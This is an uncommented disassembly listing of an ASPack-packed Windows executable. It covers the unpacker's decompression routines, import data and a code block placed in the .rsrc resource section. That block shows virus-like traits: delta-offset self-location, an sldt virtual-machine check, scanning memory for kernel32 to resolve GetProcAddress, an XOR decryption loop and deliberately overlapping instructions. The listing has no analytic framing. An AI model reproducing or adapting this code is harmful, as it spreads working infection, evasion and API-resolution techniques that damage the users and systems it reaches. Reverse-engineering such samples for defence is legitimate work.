arg_0 = dword ptr 4
push ecx
mov edx, ecx
push esi
mov ecx, 8
push edi
cmp [edx+4], ecx
jb short loc_4276A1
push ebx
mov esi, 0FFFFFFF8h
loc_427672: ; CODE XREF: sub_42765D+41�j
mov eax, [edx]
mov bl, [eax]
inc eax
mov byte ptr [esp+10h+var_4], bl
mov [edx], eax
mov eax, [edx+8]
mov edi, [esp+10h+var_4]
shl eax, 8
and edi, 0FFh
or eax, edi
mov edi, [edx+4]
add edi, esi
mov [edx+8], eax
mov eax, edi
mov [edx+4], edi
cmp eax, ecx
jnb short loc_427672
pop ebx
loc_4276A1: ; CODE XREF: sub_42765D+D�j
mov esi, [edx+4]
mov eax, [edx+8]
mov edi, [esp+0Ch+arg_0]
sub ecx, esi
shr eax, cl
mov ecx, 18h
sub ecx, edi
and eax, 0FFFFFFh
shr eax, cl
add esi, edi
pop edi
mov [edx+4], esi
pop esi
pop ecx
retn 4
sub_42765D endp
; =============== S U B R O U T I N E =======================================
sub_4276C8 proc near ; CODE XREF: sub_42793D+3E�p
; sub_42793D+4C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov edx, [esp+arg_4]
mov [ecx+84h], eax
mov [ecx+88h], edx
lea eax, [edx+eax*4]
mov [ecx+8Ch], eax
add eax, 100h
retn 8
sub_4276C8 endp
; =============== S U B R O U T I N E =======================================
sub_4276ED proc near ; CODE XREF: sub_427A1C+4C�p
; sub_427A1C+F7�p ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
arg_0 = dword ptr 4
sub esp, 98h
push ebx
push ebp
push esi
mov edx, ecx
push edi
mov ecx, 0Fh
mov ebp, [edx+84h]
xor eax, eax
lea edi, [esp+0A8h+var_7C]
xor esi, esi
rep stosd
mov edi, [esp+0A8h+arg_0]
cmp ebp, esi
mov [esp+0A8h+var_88], edx
jbe short loc_427732
loc_42771D: ; CODE XREF: sub_4276ED+43�j
xor ecx, ecx
mov cl, [eax+edi]
mov ebx, [esp+ecx*4+0A8h+var_80]
lea ecx, [esp+ecx*4+0A8h+var_80]
inc ebx
inc eax
cmp eax, ebp
mov [ecx], ebx
jb short loc_42771D
loc_427732: ; CODE XREF: sub_4276ED+2E�j
mov ecx, 17h
mov [esp+0A8h+var_80], esi
mov [edx+4], esi
mov [edx+44h], esi
mov [esp+0A8h+var_40], esi
xor edi, edi
mov [esp+0A8h+var_8C], esi
mov [esp+0A8h+var_98], 1
mov [esp+0A8h+var_90], ecx
lea ebp, [edx+8]
mov [esp+0A8h+var_94], esi
loc_42775E: ; CODE XREF: sub_4276ED+109�j
mov eax, [esp+esi+0A8h+var_7C]
shl eax, cl
add edi, eax
cmp edi, 1000000h
mov [esp+0A8h+var_84], edi
ja loc_427804
mov eax, [esp+esi+0A8h+var_80]
mov [ebp+0], edi
mov ebx, [ebp+3Ch]
add eax, ebx
cmp ecx, 10h
mov [ebp+40h], eax
mov [esp+esi+0A8h+var_3C], eax
jl short loc_4277DB
mov esi, [ebp+0]
mov eax, [esp+0A8h+var_98]
mov ebx, [esp+0A8h+var_8C]
mov edi, [edx+8Ch]
shr esi, 10h
mov ecx, esi
and eax, 0FFh
sub ecx, ebx
add edi, ebx
mov bl, al
mov edx, ecx
mov bh, bl
mov [esp+0A8h+var_8C], esi
mov eax, ebx
mov esi, [esp+0A8h+var_94]
shl eax, 10h
mov ax, bx
shr ecx, 2
rep stosd
mov ecx, edx
mov edx, [esp+0A8h+var_88]
and ecx, 3
rep stosb
mov edi, [esp+0A8h+var_84]
mov ecx, [esp+0A8h+var_90]
loc_4277DB: ; CODE XREF: sub_4276ED+9F�j
mov eax, [esp+0A8h+var_98]
add esi, 4
inc eax
dec ecx
add ebp, 4
cmp ecx, 9
mov [esp+0A8h+var_98], eax
mov [esp+0A8h+var_90], ecx
mov [esp+0A8h+var_94], esi
jge loc_42775E
cmp edi, 1000000h
jz short loc_427813
loc_427804: ; CODE XREF: sub_4276ED+83�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
add esp, 98h
retn 4
; ---------------------------------------------------------------------------
loc_427813: ; CODE XREF: sub_4276ED+115�j
mov eax, [edx+84h]
xor ecx, ecx
test eax, eax
jbe short loc_42785A
mov esi, [esp+0A8h+arg_0]
loc_427826: ; CODE XREF: sub_4276ED+16B�j
mov al, [ecx+esi]
test al, al
jz short loc_42784F
mov edi, [edx+88h]
and eax, 0FFh
mov eax, [esp+eax*4+0A8h+var_40]
mov [edi+eax*4], ecx
xor eax, eax
mov al, [ecx+esi]
mov edi, [esp+eax*4+0A8h+var_40]
lea eax, [esp+eax*4+0A8h+var_40]
inc edi
mov [eax], edi
loc_42784F: ; CODE XREF: sub_4276ED+13E�j
mov eax, [edx+84h]
inc ecx
cmp ecx, eax
jb short loc_427826
loc_42785A: ; CODE XREF: sub_4276ED+130�j
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 98h
retn 4
sub_4276ED endp
; =============== S U B R O U T I N E =======================================
sub_427869 proc near ; CODE XREF: sub_427A1C+64�p
; sub_427BC0+28�p ...
var_4 = dword ptr -4
push ecx
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi]
cmp dword ptr [eax+4], 8
jb short loc_4278A7
loc_427877: ; CODE XREF: sub_427869+3C�j
mov ecx, [eax]
mov dl, [ecx]
inc ecx
mov byte ptr [esp+10h+var_4], dl
mov [eax], ecx
mov ecx, [eax+8]
mov edx, [esp+10h+var_4]
shl ecx, 8
and edx, 0FFh
or ecx, edx
mov edx, [eax+4]
add edx, 0FFFFFFF8h
mov [eax+8], ecx
mov ecx, edx
mov [eax+4], edx
cmp ecx, 8
jnb short loc_427877
loc_4278A7: ; CODE XREF: sub_427869+C�j
mov edx, [eax+4]
mov eax, [eax+8]
mov ecx, 8
sub ecx, edx
shr eax, cl
mov ecx, [esi+24h]
and eax, 0FFFE00h
cmp eax, ecx
jnb short loc_4278D6
mov edx, [esi+8Ch]
mov ecx, eax
shr ecx, 10h
xor ebx, ebx
mov bl, [ecx+edx]
mov edx, ebx
jmp short loc_427911
; ---------------------------------------------------------------------------
loc_4278D6: ; CODE XREF: sub_427869+57�j
cmp eax, [esi+2Ch]
jnb short loc_4278E5
cmp eax, [esi+28h]
sbb edx, edx
add edx, 0Ah
jmp short loc_427911
; ---------------------------------------------------------------------------
loc_4278E5: ; CODE XREF: sub_427869+70�j
cmp eax, [esi+30h]
jnb short loc_4278F1
mov edx, 0Bh
jmp short loc_427911
; ---------------------------------------------------------------------------
loc_4278F1: ; CODE XREF: sub_427869+7F�j
cmp eax, [esi+34h]
jnb short loc_4278FD
mov edx, 0Ch
jmp short loc_427911
; ---------------------------------------------------------------------------
loc_4278FD: ; CODE XREF: sub_427869+8B�j
cmp eax, [esi+38h]
jnb short loc_427909
mov edx, 0Dh
jmp short loc_427911
; ---------------------------------------------------------------------------
loc_427909: ; CODE XREF: sub_427869+97�j
cmp eax, [esi+3Ch]
sbb edx, edx
add edx, 0Fh
loc_427911: ; CODE XREF: sub_427869+6B�j
; sub_427869+7A�j ...
mov ecx, [esi]
mov edi, [ecx+4]
add edi, edx
mov [ecx+4], edi
mov ebx, [esi+edx*4]
mov ecx, 18h
sub eax, ebx
sub ecx, edx
pop edi
shr eax, cl
mov ecx, [esi+edx*4+44h]
add eax, ecx
mov ecx, [esi+88h]
pop esi
pop ebx
mov eax, [ecx+eax*4]
pop ecx
retn
sub_427869 endp
; =============== S U B R O U T I N E =======================================
sub_42793D proc near ; CODE XREF: .aspack:00427590�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
mov edi, ecx
xor edx, edx
xor eax, eax
lea esi, [edi+268h]
loc_42794C: ; CODE XREF: sub_42793D+2F�j
mov [esi], edx
push esi
call sub_427BB2
mov cl, ds:byte_443FC7[eax+esi]
pop esi
mov ebx, 1
add esi, 4
shl ebx, cl
add edx, ebx
inc eax
cmp eax, 3Ah
jb short loc_42794C
mov eax, [esp+0Ch+arg_0]
lea ecx, [edi+10h]
push eax
push 2D1h
call sub_4276C8
push eax
push 1Ch
lea ecx, [edi+0A0h]
call sub_4276C8
push eax
push 8
lea ecx, [edi+130h]
call sub_4276C8
push eax
push 13h
lea ecx, [edi+1C0h]
call sub_4276C8
mov [edi+260h], eax
pop edi
pop esi
add eax, 2F5h
pop ebx
retn 4
sub_42793D endp
; =============== S U B R O U T I N E =======================================
sub_4279BB proc near ; CODE XREF: .aspack:004275A9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, ecx
mov ecx, [esp+arg_0]
push edi
mov [edx], eax
lea eax, [edx+4]
mov [eax], ecx
mov dword ptr [eax+4], 20h
mov [edx+10h], eax
mov [edx+0A0h], eax
mov [edx+130h], eax
mov [edx+1C0h], eax
xor eax, eax
mov ecx, 0BDh
mov [edx+250h], eax
mov [edx+254h], eax
mov [edx+258h], eax
mov edi, [edx+260h]
mov [edx+25Ch], eax
rep stosd
mov ecx, edx
stosb
call sub_427A1C
pop edi
retn 8
sub_4279BB endp
; =============== S U B R O U T I N E =======================================
sub_427A1C proc near ; CODE XREF: sub_4279BB+58�p
; sub_427BC0+267�p
var_30C = byte ptr -30Ch
var_2F9 = byte ptr -2F9h
var_2F8 = byte ptr -2F8h
var_27 = byte ptr -27h
var_B = byte ptr -0Bh
sub esp, 30Ch
push ebx
mov ebx, ecx
push ebp
push esi
lea ebp, [ebx+4]
push edi
push 1
mov ecx, ebp
call sub_42765D
test eax, eax
jnz short loc_427A46
mov edi, [ebx+260h]
mov ecx, 0BDh
rep stosd
stosb
loc_427A46: ; CODE XREF: sub_427A1C+1A�j
xor esi, esi
loc_427A48: ; CODE XREF: sub_427A1C+3D�j
push 4
mov ecx, ebp
call sub_42765D
mov [esp+esi+31Ch+var_30C], al
inc esi
cmp esi, 13h
jb short loc_427A48
lea edi, [ebx+1C0h]
lea eax, [esp+31Ch+var_30C]
push eax
mov ecx, edi
call sub_4276ED
test al, al
jnz short loc_427A7C
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_427A7C: ; CODE XREF: sub_427A1C+53�j
xor esi, esi
loc_427A7E: ; CODE XREF: sub_427A1C+E9�j
mov ecx, edi
call sub_427869
cmp eax, 10h
jnb short loc_427A9F
mov ecx, [ebx+260h]
mov dl, [ecx+esi]
add dl, al
and dl, 0Fh
mov [esp+esi+31Ch+var_2F8], dl
inc esi
jmp short loc_427AFF
; ---------------------------------------------------------------------------
loc_427A9F: ; CODE XREF: sub_427A1C+6C�j
jnz short loc_427AC9
push 2
mov ecx, ebp
call sub_42765D
add eax, 3
test eax, eax
jle short loc_427AFF
loc_427AB1: ; CODE XREF: sub_427A1C+A9�j
cmp esi, 2F5h
jge short loc_427B0B
mov cl, [esp+esi+31Ch+var_2F9]
dec eax
mov [esp+esi+31Ch+var_2F8], cl
inc esi
test eax, eax
jg short loc_427AB1
jmp short loc_427AFF
; ---------------------------------------------------------------------------
loc_427AC9: ; CODE XREF: sub_427A1C:loc_427A9F�j
cmp eax, 11h
jnz short loc_427ADC
push 3
mov ecx, ebp
call sub_42765D
add eax, 3
jmp short loc_427AE8
; ---------------------------------------------------------------------------
loc_427ADC: ; CODE XREF: sub_427A1C+B0�j
push 7
mov ecx, ebp
call sub_42765D
add eax, 0Bh
loc_427AE8: ; CODE XREF: sub_427A1C+BE�j
test eax, eax
jle short loc_427AFF
loc_427AEC: ; CODE XREF: sub_427A1C+E1�j
cmp esi, 2F5h
jge short loc_427B0B
mov [esp+esi+31Ch+var_2F8], 0
inc esi
dec eax
test eax, eax
jg short loc_427AEC
loc_427AFF: ; CODE XREF: sub_427A1C+81�j
; sub_427A1C+93�j ...
cmp esi, 2F5h
jl loc_427A7E
loc_427B0B: ; CODE XREF: sub_427A1C+9B�j
; sub_427A1C+D6�j
lea edx, [esp+31Ch+var_2F8]
lea ecx, [ebx+10h]
push edx
call sub_4276ED
test al, al
jnz short loc_427B27
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_427B27: ; CODE XREF: sub_427A1C+FE�j
lea eax, [esp+31Ch+var_27]
lea ecx, [ebx+0A0h]
push eax
call sub_4276ED
test al, al
jnz short loc_427B49
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_427B49: ; CODE XREF: sub_427A1C+120�j
lea ecx, [esp+31Ch+var_B]
push ecx
lea ecx, [ebx+130h]
call sub_4276ED
test al, al
jnz short loc_427B6B
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_427B6B: ; CODE XREF: sub_427A1C+142�j
mov byte ptr [ebx+264h], 0
xor eax, eax
loc_427B74: ; CODE XREF: sub_427A1C+166�j
cmp [esp+eax+31Ch+var_B], 3
jnz short loc_427B86
inc eax
cmp eax, 8
jb short loc_427B74
jmp short loc_427B8D
; ---------------------------------------------------------------------------
loc_427B86: ; CODE XREF: sub_427A1C+160�j
mov byte ptr [ebx+264h], 1
loc_427B8D: ; CODE XREF: sub_427A1C+168�j
mov eax, [ebx+260h]
lea ecx, [esp+31Ch+var_2F8]
mov esi, 2F5h
loc_427B9C: ; CODE XREF: sub_427A1C+187�j
mov dl, [ecx]
mov [eax], dl
inc eax
inc ecx
dec esi
jnz short loc_427B9C
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 30Ch
retn
sub_427A1C endp
; =============== S U B R O U T I N E =======================================
sub_427BB2 proc near ; CODE XREF: sub_42793D+12�p
; sub_427BC0+80�p ...
call sub_427BB8
nop
sub_427BB2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_427BB8 proc near ; CODE XREF: sub_427BB2�p
pop esi
sub esi, offset byte_44455B
retn
sub_427BB8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_427BC0 proc near ; CODE XREF: .aspack:004275CC�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 14h
mov eax, [esp+14h+arg_4]
push ebx
push ebp
push esi
mov dword ptr [eax], 0
mov eax, [esp+20h+arg_0]
push edi
xor edi, edi
test eax, eax
mov esi, ecx
mov [esp+24h+var_14], edi
jbe loc_427E40
loc_427BE5: ; CODE XREF: sub_427BC0+274�j
lea ecx, [esi+10h]
call sub_427869
cmp eax, 100h
jnb short loc_427C07
mov ecx, [esi]
mov [ecx], al
mov ecx, [esi]
inc ecx
inc edi
mov [esi], ecx
mov [esp+24h+var_14], edi
jmp loc_427E30
; ---------------------------------------------------------------------------
loc_427C07: ; CODE XREF: sub_427BC0+32�j
cmp eax, 2D0h
jnb loc_427E25
add eax, 0FFFFFF00h
mov ebp, eax
and eax, 7
shr ebp, 3
lea edx, [eax+2]
cmp eax, 7
mov [esp+24h+var_10], edx
jnz loc_427CC3
lea ecx, [esi+0A0h]
call sub_427869
mov ecx, [esi+8]
xor ebx, ebx
push esi
call sub_427BB2
mov bl, byte ptr ds:(loc_443FA6+5)[eax+esi]
pop esi
cmp ecx, 8
jb short loc_427C84
loc_427C52: ; CODE XREF: sub_427BC0+C2�j
mov ecx, [esi+4]
mov dl, [ecx]
inc ecx
mov byte ptr [esp+24h+var_C], dl
mov [esi+4], ecx
mov ecx, [esi+0Ch]
mov edx, [esp+24h+var_C]
shl ecx, 8
and edx, 0FFh
or ecx, edx
mov edx, [esi+8]
add edx, 0FFFFFFF8h
mov [esi+0Ch], ecx
mov ecx, edx
mov [esi+8], edx
cmp ecx, 8
jnb short loc_427C52
loc_427C84: ; CODE XREF: sub_427BC0+90�j
mov edi, [esi+8]
mov edx, [esi+0Ch]
mov ecx, 8
sub ecx, edi
add edi, ebx
shr edx, cl
mov ecx, 18h
mov [esi+8], edi
sub ecx, ebx
and edx, 0FFFFFFh
shr edx, cl
xor ecx, ecx
push esi
call sub_427BB2
mov cl, byte ptr ds:(loc_443F8E+1)[eax+esi]
pop esi
mov eax, [esp+24h+var_10]
add ecx, edx
add eax, ecx
mov [esp+24h+var_10], eax
loc_427CC3: ; CODE XREF: sub_427BC0+69�j
mov al, [esi+264h]
mov ebx, [esi+ebp*4+268h]
xor edx, edx
push esi
call sub_427BB2
mov dl, ss:byte_443FC7[ebp+esi]
pop esi
test al, al
mov edi, edx
jz short loc_427D5C
cmp edi, 3
jb short loc_427D5C
mov eax, [esi+8]
lea ebp, [edi-3]
cmp eax, 8
jb short loc_427D27
loc_427CF6: ; CODE XREF: sub_427BC0+165�j
mov eax, [esi+4]
mov edx, [esi+0Ch]
shl edx, 8
mov cl, [eax]
inc eax
mov byte ptr [esp+24h+var_8], cl
mov ecx, [esi+8]
mov [esi+4], eax
mov eax, [esp+24h+var_8]
and eax, 0FFh
add ecx, 0FFFFFFF8h
or edx, eax
mov eax, ecx
cmp eax, 8
mov [esi+0Ch], edx
mov [esi+8], ecx
jnb short loc_427CF6
loc_427D27: ; CODE XREF: sub_427BC0+134�j
mov eax, [esi+8]
mov edi, [esi+0Ch]
mov ecx, 8
sub ecx, eax
add eax, ebp
shr edi, cl
mov ecx, 18h
mov [esi+8], eax
sub ecx, ebp
and edi, 0FFFFFFh
shr edi, cl
lea ecx, [esi+130h]
call sub_427869
add eax, ebx
lea ebx, [eax+edi*8]
jmp short loc_427DB7
; ---------------------------------------------------------------------------
loc_427D5C: ; CODE XREF: sub_427BC0+124�j
; sub_427BC0+129�j
cmp dword ptr [esi+8], 8
jb short loc_427D93
loc_427D62: ; CODE XREF: sub_427BC0+1D1�j
mov eax, [esi+4]
mov edx, [esi+0Ch]
shl edx, 8
mov cl, [eax]
inc eax
mov byte ptr [esp+24h+var_4], cl
mov ecx, [esi+8]
mov [esi+4], eax
mov eax, [esp+24h+var_4]
and eax, 0FFh
add ecx, 0FFFFFFF8h
or edx, eax
mov eax, ecx
cmp eax, 8
mov [esi+0Ch], edx
mov [esi+8], ecx
jnb short loc_427D62
loc_427D93: ; CODE XREF: sub_427BC0+1A0�j
mov edx, [esi+8]
mov eax, [esi+0Ch]
mov ecx, 8
sub ecx, edx
add edx, edi
shr eax, cl
mov ecx, 18h
mov [esi+8], edx
sub ecx, edi
and eax, 0FFFFFFh
shr eax, cl
add ebx, eax
loc_427DB7: ; CODE XREF: sub_427BC0+19A�j
cmp ebx, 3
jnb short loc_427DD6
mov ecx, [esi+ebx*4+250h]
test ebx, ebx
jz short loc_427DF7
mov edx, [esi+250h]
mov [esi+ebx*4+250h], edx
jmp short loc_427DF1
; ---------------------------------------------------------------------------
loc_427DD6: ; CODE XREF: sub_427BC0+1FA�j
mov eax, [esi+254h]
mov edx, [esi+250h]
lea ecx, [ebx-3]
mov [esi+258h], eax
mov [esi+254h], edx
loc_427DF1: ; CODE XREF: sub_427BC0+214�j
mov [esi+250h], ecx
loc_427DF7: ; CODE XREF: sub_427BC0+205�j
mov eax, [esi]
mov edi, [esp+24h+var_10]
inc ecx
lea edx, [eax+edi]
cmp eax, edx
mov [esi], edx
jnb short loc_427E17
loc_427E07: ; CODE XREF: sub_427BC0+255�j
mov edx, eax
sub edx, ecx
inc eax
mov dl, [edx]
mov [eax-1], dl
mov edx, [esi]
cmp eax, edx
jb short loc_427E07
loc_427E17: ; CODE XREF: sub_427BC0+245�j
mov eax, [esp+24h+var_14]
add eax, edi
mov [esp+24h+var_14], eax
mov edi, eax
jmp short loc_427E30
; ---------------------------------------------------------------------------
loc_427E25: ; CODE XREF: sub_427BC0+4C�j
mov ecx, esi
call sub_427A1C
test al, al
jz short loc_427E4C
loc_427E30: ; CODE XREF: sub_427BC0+42�j
; sub_427BC0+263�j
cmp edi, [esp+24h+arg_0]
jb loc_427BE5
mov eax, [esp+24h+arg_4]
mov [eax], edi
loc_427E40: ; CODE XREF: sub_427BC0+1F�j
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 14h
retn 8
; ---------------------------------------------------------------------------
loc_427E4C: ; CODE XREF: sub_427BC0+26E�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
add esp, 14h
retn 8
sub_427BC0 endp
; ---------------------------------------------------------------------------
dd 0
dd 8, 400000h, 7C800000h, 6E72656Bh, 32336C65h, 6C6C642Eh
dd 72695600h, 6C617574h, 6F6C6C41h, 69560063h, 61757472h
dd 6572466Ch, 69560065h, 61757472h, 6F72506Ch, 74636574h
dd 69784500h, 6F725074h, 73736563h, 0
db 0
db 75h, 73h, 65h
db 72h ; r
db 33h, 32h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
aMessageboxa db 'MessageBoxA',0
aWsprintfa db 'wsprintfA',0
aLoaderError db 'LOADER ERROR',0
aTheProcedureEn db 'The procedure entry point %s could not be located in the dynamic '
db 'link library %s',0
aTheOrdinalUCou db 'The ordinal %u could not be located in the dynamic link library %'
db 's',0
align 10h
dword_427F70 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_442022+2E�r
dd 7C80B6A1h, 7C801D77h, 0
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 47000000h, 72507465h
dd 6441636Fh, 73657264h, 73h, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 4C000000h, 4C64616Fh, 61726269h, 417972h
dd 3 dup(0)
dd 27F80h, 27F70h, 3 dup(0)
dd 28074h, 280C4h, 3 dup(0)
dd 28081h, 280CCh, 3 dup(0)
dd 2808Dh, 280D4h, 3 dup(0)
dd 28097h, 280DCh, 3 dup(0)
dd 280A2h, 280E4h, 3 dup(0)
dd 280ACh, 280ECh, 3 dup(0)
dd 280B9h, 280F4h, 5 dup(0)
dd 61656C6Fh, 32337475h, 6C6C642Eh, 6E697700h, 74656E69h
dd 6C6C642Eh, 656C6F00h, 642E3233h, 75006C6Ch, 33726573h
dd 6C642E32h, 6467006Ch, 2E323369h, 6C6C64h, 61766461h
dd 32336970h, 6C6C642Eh, 74726300h, 2E6C6C64h, 6C6C64h
dd 77124C05h, 0
dd 42C2DE3Dh, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0FAh, 4Fh, 77h
dd 0
dd 7E43212Bh, 0
dd 77F161D1h, 0
dd 77DD7753h, 0
; ---------------------------------------------------------------------------
jmp short loc_428165
; ---------------------------------------------------------------------------
dw 73D9h
dd 0
db 0
align 2
aSysallocstring db 'SysAllocString',0
db 2 dup(0), 46h
aIndfirsturlcac db 'indFirstUrlCacheEntryA',0
align 4
dd 436F4300h, 74616572h, 736E4965h, 636E6174h, 65h, 57746547h
dd 6F646E69h, 78655477h, 4174h, 74654700h, 636F7453h, 6A624F6Bh
dd 746365h, 704F0000h, 72506E65h
db 6Fh
; ---------------------------------------------------------------------------
loc_428165: ; CODE XREF: .aspack:004280F4�j
arpl [ebp+73h], sp
jnb short near ptr word_4281BE
outsd
imul esp, [ebp+6Eh], 0
; ---------------------------------------------------------------------------
db 0
dd 74695F00h, 616Fh, 11h dup(0)
db 2 dup(0)
word_4281BE dw 0 ; CODE XREF: .aspack:00428168�j
align 1000h
_aspack ends
; Section 6. (virtual address 00029000)
; Virtual size : 00021000 ( 135168.)
; Section size in file : 00021000 ( 135168.)
; Offset to raw data for section: 00029000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 429000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 400h dup(0)
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_42A04D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_42A041
mov ebx, [eax+29C1h]
jmp short loc_42A04B
; ---------------------------------------------------------------------------
loc_42A041: ; CODE XREF: .rsrc:0042A037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_42A04B: ; CODE XREF: .rsrc:0042A03F�j
mov ebx, [ebx]
loc_42A04D: ; CODE XREF: .rsrc:0042A01F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 3004h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0EAh
rep movsb
sldt cx
test ecx, ecx
jnz short loc_42A07B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_42A07B: ; CODE XREF: .rsrc:0042A074�j
and ebx, 0FFFFF000h
loc_42A081: ; CODE XREF: .rsrc:0042A090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_42A092
loc_42A08A: ; CODE XREF: .rsrc:0042A09F�j
sub ebx, 100h
jnz short loc_42A081
loc_42A092: ; CODE XREF: .rsrc:0042A088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_42A08A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_42A0AC: ; CODE XREF: .rsrc:loc_42A0C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_42A0C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_42A0C5
loc_42A0C0: ; CODE XREF: .rsrc:0042A0B5�j
loop loc_42A0AC
pop ecx
jmp short loc_42A0F0
; ---------------------------------------------------------------------------
loc_42A0C5: ; CODE XREF: .rsrc:0042A0BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_42A137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A17E
loc_42A0F0: ; CODE XREF: .rsrc:0042A0C3�j
; sub_42A17E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_42A11C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_42A11C: ; CODE XREF: sub_42A17E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42A17E
; ---------------------------------------------------------------------------
dw 0BD3Ah
; =============== S U B R O U T I N E =======================================
sub_42A120 proc near ; CODE XREF: sub_42C45B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_42A128: ; CODE XREF: sub_42A120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_42A128
pop ebx
retn
sub_42A120 endp
; ---------------------------------------------------------------------------
loc_42A137: ; CODE XREF: .rsrc:0042A0EE�j
call near ptr loc_42A146+2
inc ebx
insb
outsd
jnb short near ptr loc_42A1A3+3
dec eax
popa
outsb
db 64h
insb
loc_42A146: ; CODE XREF: .rsrc:loc_42A137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_42A162+1
inc ebx
jb short loc_42A1BE
popa
jz short near ptr loc_42A1C0+1
inc ebp
jbe short near ptr loc_42A1C0+4
outsb
jz short loc_42A1A3
loc_42A162: ; CODE XREF: .rsrc:0042A151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_42A17E
inc edi
db 65h
jz short near ptr loc_42A1C0+1
popa
jnb short near ptr loc_42A1EA+2
inc ebp
jb short near ptr loc_42A1EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_42A17E proc near ; CODE XREF: .rsrc:0042A16C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042A0F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 0042A534 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_42A55F
test eax, eax
jz loc_42A0F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_42A534
loc_42A1A3: ; CODE XREF: .rsrc:0042A160�j
; .rsrc:0042A13F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_42A1C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_42A1BE: ; CODE XREF: .rsrc:0042A157�j
jmp short loc_42A1C7
; ---------------------------------------------------------------------------
loc_42A1C0: ; CODE XREF: sub_42A17E+2C�j
; .rsrc:0042A15A�j ...
and dword ptr [ebp+101598h], 0
loc_42A1C7: ; CODE XREF: sub_42A17E:loc_42A1BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_42A1EA: ; CODE XREF: .rsrc:0042A176�j
; .rsrc:0042A179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_42A59C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_42A2E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
